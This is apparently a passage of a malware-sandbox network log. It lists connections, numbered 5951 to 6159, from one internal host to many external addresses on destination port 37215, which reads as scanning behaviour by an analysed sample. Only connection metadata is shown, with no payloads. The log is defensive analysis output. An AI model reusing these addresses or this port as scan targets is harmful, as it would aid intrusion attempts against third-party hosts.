                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5951192.168.2.1559620157.198.201.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5952192.168.2.155603441.196.155.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5953192.168.2.1545080157.231.11.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5954192.168.2.153448080.57.132.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5955192.168.2.153778641.15.227.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5956192.168.2.1538208197.183.20.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5957192.168.2.1537496208.238.218.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5958192.168.2.1541356197.186.24.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5959192.168.2.1555168157.81.48.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5960192.168.2.1558324167.9.109.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5961192.168.2.1550982197.179.144.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5962192.168.2.1538540197.15.117.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5963192.168.2.154305277.140.242.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5964192.168.2.1557984197.92.53.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5965192.168.2.155760441.29.147.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5966192.168.2.1550924197.202.98.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5967192.168.2.1560110197.108.206.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5968192.168.2.155604271.171.129.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5969192.168.2.154529641.237.222.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5970192.168.2.1555934157.5.36.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5971192.168.2.1536394157.23.62.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5972192.168.2.1556008197.36.89.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5973192.168.2.1548512197.54.226.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5974192.168.2.154355641.209.42.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5975192.168.2.1542726116.201.69.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5976192.168.2.1546410197.120.176.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5977192.168.2.1540638197.194.175.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5978192.168.2.155278641.198.102.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5979192.168.2.15382765.40.67.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5980192.168.2.1550832157.15.210.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5981192.168.2.1535160157.1.187.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5982192.168.2.1537726197.235.113.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5983192.168.2.155395841.37.16.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5984192.168.2.1536524157.67.191.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5985192.168.2.1559264107.254.123.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5986192.168.2.1533148157.243.236.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5987192.168.2.155070241.169.105.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5988192.168.2.155468041.218.28.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5989192.168.2.153613241.190.153.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5990192.168.2.1554088157.131.66.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5991192.168.2.155438841.58.111.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5992192.168.2.1558190197.13.42.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5993192.168.2.1559870197.69.231.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5994192.168.2.155304027.127.199.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5995192.168.2.1537736157.88.188.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5996192.168.2.155364879.53.84.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5997192.168.2.1542980197.178.198.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5998192.168.2.155633041.64.120.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5999192.168.2.1549790197.66.209.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6000192.168.2.1543254147.15.11.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6001192.168.2.154912241.27.2.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6002192.168.2.153300441.125.115.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6003192.168.2.1536520197.104.161.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6004192.168.2.1533324157.69.31.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6005192.168.2.1559056129.189.161.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6006192.168.2.1553956197.39.111.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6007192.168.2.1560466157.179.216.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6008192.168.2.1551462157.161.229.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6009192.168.2.1552958157.21.20.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6010192.168.2.153940641.184.228.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6011192.168.2.155045441.168.56.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6012192.168.2.154749841.206.169.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6013192.168.2.1559288157.114.134.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6014192.168.2.155568813.133.46.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6015192.168.2.1549444157.201.225.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6016192.168.2.1537910197.145.249.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6017192.168.2.1554204184.251.138.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6018192.168.2.154638041.28.182.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6019192.168.2.1540520112.235.96.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6020192.168.2.1533070197.229.65.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6021192.168.2.1558444197.216.65.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6022192.168.2.155910476.34.218.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6023192.168.2.1549016222.240.150.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6024192.168.2.155564041.50.16.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6025192.168.2.1539618183.64.83.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6026192.168.2.153957641.114.242.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6027192.168.2.1545364197.197.80.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6028192.168.2.1551624157.217.89.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6029192.168.2.15582664.238.27.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6030192.168.2.1553266197.215.82.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6031192.168.2.1549426157.255.8.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6032192.168.2.154024641.190.223.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6033192.168.2.1540386197.73.171.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6034192.168.2.1542046157.204.99.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6035192.168.2.1548250188.198.177.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6036192.168.2.154471448.158.168.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6037192.168.2.154405424.110.153.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6038192.168.2.154376241.90.106.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6039192.168.2.155334648.58.224.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6040192.168.2.153730841.167.152.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6041192.168.2.1533998157.146.141.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6042192.168.2.155881641.14.106.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6043192.168.2.154182241.86.167.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6044192.168.2.154004441.163.24.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6045192.168.2.155595841.49.43.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6046192.168.2.154905241.22.5.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6047192.168.2.1548448140.61.158.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6048192.168.2.154085441.147.218.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6049192.168.2.1560474109.11.215.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6050192.168.2.1556914210.64.187.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6051192.168.2.1547590112.188.29.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6052192.168.2.1548004197.42.234.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6053192.168.2.154143880.94.165.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6054192.168.2.1548992157.190.255.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6055192.168.2.153954241.158.90.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6056192.168.2.1559146197.17.224.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6057192.168.2.153889641.223.146.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6058192.168.2.1535570157.125.11.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6059192.168.2.1557050197.204.61.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6060192.168.2.153642041.105.252.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6061192.168.2.1541004157.134.120.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6062192.168.2.1539614157.161.227.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6063192.168.2.1537990157.93.115.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6064192.168.2.1546500157.237.117.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6065192.168.2.1540442119.118.23.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6066192.168.2.1552054197.72.180.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6067192.168.2.154891641.128.239.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6068192.168.2.1542708162.52.69.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6069192.168.2.1538616145.134.204.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6070192.168.2.15552262.113.150.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6071192.168.2.1534788197.27.222.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6072192.168.2.1537226197.6.249.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6073192.168.2.1533296197.245.234.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6074192.168.2.154216888.250.109.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6075192.168.2.1537844197.28.233.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6076192.168.2.1539332157.185.162.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6077192.168.2.1546832173.203.223.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6078192.168.2.1551580113.173.97.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6079192.168.2.1534570197.143.114.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6080192.168.2.153474641.225.200.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6081192.168.2.1540458157.171.22.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6082192.168.2.1538040157.146.190.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6083192.168.2.1544970197.210.57.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6084192.168.2.155509041.150.152.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6085192.168.2.1545332197.143.194.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6086192.168.2.1550290149.23.47.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6087192.168.2.1540240197.126.58.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6088192.168.2.1552750157.108.108.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6089192.168.2.1537550197.187.166.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6090192.168.2.1546314157.66.155.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6091192.168.2.1555604197.44.14.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6092192.168.2.153721641.80.23.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6093192.168.2.1541868157.200.169.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6094192.168.2.154223841.25.19.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6095192.168.2.155580889.134.41.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6096192.168.2.1547230197.125.81.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6097192.168.2.1548288157.123.181.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6098192.168.2.1554258197.211.108.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6099192.168.2.154547441.185.53.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6100192.168.2.1536258197.167.156.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6101192.168.2.154716670.110.142.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6102192.168.2.1560044199.157.168.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6103192.168.2.153638689.112.225.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6104192.168.2.155697041.153.222.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6105192.168.2.1542876197.111.233.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6106192.168.2.153884236.214.215.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6107192.168.2.1551354154.243.59.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6108192.168.2.1541868197.116.217.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6109192.168.2.1553600202.143.157.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6110192.168.2.1535662197.34.195.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6111192.168.2.154775678.131.41.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6112192.168.2.15394201.53.48.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6113192.168.2.155715241.108.170.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6114192.168.2.155001041.84.187.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6115192.168.2.1535620197.185.148.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6116192.168.2.1557030213.209.239.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6117192.168.2.1541448157.106.71.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6118192.168.2.1544072197.79.214.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6119192.168.2.1538306197.157.191.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6120192.168.2.1536188157.168.209.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6121192.168.2.1542022157.237.254.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6122192.168.2.1539630197.133.42.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6123192.168.2.1554158104.226.142.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6124192.168.2.155773634.97.152.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6125192.168.2.154269294.74.166.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6126192.168.2.1537234144.93.4.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6127192.168.2.15534501.0.217.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6128192.168.2.153706041.211.132.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6129192.168.2.154672641.185.144.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6130192.168.2.1536756165.249.106.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6131192.168.2.1547270197.227.30.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6132192.168.2.1551744133.252.66.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6133192.168.2.1543808157.0.193.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6134192.168.2.1546544157.90.54.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6135192.168.2.1547542197.196.2.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6136192.168.2.1557182103.32.201.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6137192.168.2.154311041.34.35.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6138192.168.2.1551340201.21.35.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6139192.168.2.154000641.202.128.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6140192.168.2.156017418.125.144.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6141192.168.2.1546776157.6.214.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6142192.168.2.1546784157.153.173.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6143192.168.2.153875441.202.194.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6144192.168.2.1542732157.71.21.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6145192.168.2.1553052157.252.19.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6146192.168.2.1557580119.41.96.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6147192.168.2.153878441.188.12.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6148192.168.2.154587648.189.113.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6149192.168.2.1560462197.44.183.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6150192.168.2.153610641.66.151.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6151192.168.2.1552834197.204.69.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6152192.168.2.1556632157.145.193.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6153192.168.2.1545670103.146.151.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6154192.168.2.1543630193.110.220.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6155192.168.2.154712441.35.132.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6156192.168.2.1557758157.164.34.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6157192.168.2.1552788197.6.194.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6158192.168.2.155556441.201.81.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6159192.168.2.154128841.91.209.4037215
                                                          TimestampBytes transferredDirectionData


